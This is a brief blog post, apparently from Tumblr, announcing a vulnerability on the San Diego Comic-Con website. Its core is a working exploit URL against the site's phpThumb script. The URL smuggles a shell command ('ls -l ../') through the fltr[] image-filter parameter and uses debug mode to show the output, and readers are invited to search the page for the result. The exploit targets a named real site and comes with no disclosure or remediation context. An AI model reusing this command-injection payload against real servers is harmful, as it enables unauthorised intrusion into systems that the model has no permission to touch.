Disturb

Jun 29

San Diego Comic-Con vulnerability

http://comic-con.org/phpThumb/phpThumb.php?src=../splash/splash_ccilogo.gif&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ../ ;&phpThumbDebug=9

Ctrl+F “failed with”

This is why you don’t use phpThumb.

Posted at 1:28 PM 1 note Tagged: Comic-concomicconSDCCexploit

  1. ebol4 posted this